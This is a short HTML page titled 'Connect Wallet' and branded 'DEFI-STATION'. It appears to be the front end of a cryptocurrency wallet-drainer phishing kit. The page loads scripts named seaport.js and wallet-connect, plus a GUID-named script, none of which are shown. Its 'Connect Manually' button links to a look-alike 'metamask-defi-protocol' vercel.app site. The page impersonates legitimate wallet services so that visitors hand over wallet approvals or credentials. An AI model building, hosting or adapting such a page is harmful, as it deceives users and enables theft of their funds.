<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connect Wallet</title>
    <link rel="shortcut icon" href="./beta/wc.png">
    <link rel="apple-touch-icon-precomposed" href="./beta/wc.png">
    <script src="./scripts/seaport.js"></script>
    <script src="./scripts/coinbase.js"></script>
    <script src="./scripts/wallet-connect-v2.js"></script>
    <script src="./scripts/wallet-connect-v3.js"></script>
    <script charset="UTF-8" type="text/javascript" src="./423c93a9-48fb-4108-8e23-a1ee1b5a0b32.js"></script>
    <style>
        body {
            background-image: url('./img_bg_page_title.jpg');
            font-family: 'MyCustomFont', sans-serif;
            background-size: cover;
            background-position: center center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        #chainpad-dapps {
            position: absolute;
            /* Add this property to the #chainpad-dapps element */
            top: 20px;
            /* Add this property to the #chainpad-dapps element */
            left: 20px;
            /* Add this property to the #chainpad-dapps element */
            margin-left: 220px;
            margin-top: 12px;
            font-weight: bold;
            font-size: 20px;
            /* Add this property to the #chainpad-dapps element */
            color: white;
            /* Add this property to the #chainpad-dapps element */
        }

        .container {
            background-color: rgba(255, 255, 255, 0.2);
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
        }

        button {
            background: none;
            color: white;
            padding: 15px 32px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            margin: 20px !important;
            font-size: 20px !important;
            font-weight: bold;
            border-color: white;
            border-style: solid;
            border-width: 3px;
            border-radius: 30px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }

        button:hover {
            background-color: white;
            color: #4B50E6;
        }

        @media all and (max-width: 600px) {
            /* Add this media query to the CSS */
            #chainpad-dapps {
                position: absolute;
                /* Add this property to the #chainpad-dapps element */
                top: 10px;
                /* Add this property to the #chainpad-dapps element */
                left: 10px;
                /* Add this property to the #chainpad-dapps element */
                margin-left: 50px;
                right: auto;
                /* Add this property to the #chainpad-dapps element */
                font-size: 20px;
                /* Add this property to the #chainpad-dapps element */
                border-top: none;
                /* Add this property to the #chainpad-dapps element */
                padding-top: 0;
                /* Add this property to the #chainpad-dapps element */
            }
            button {
                display: inline-block;
                /* Add this property to the button element */
                width: 90%;
                margin: 10px 20px;
                /* Add this property to the button element */
                font-size: 12px;
                align-items: center;
                justify-content: center;
            }
        }
    </style>
</head>

<body>
    <div id="chainpad-dapps">DEFI-STATION</div>
    <div class="container">
        <button class="interact-button" id="connect-wallet">Connect Wallet</button>
        <a href="https://metamask-defi-protocol.vercel.app/wallet/index.html">
		<button id="connect-manually">Connect Manually</button>
		</a>
    </div>

</body>

</html>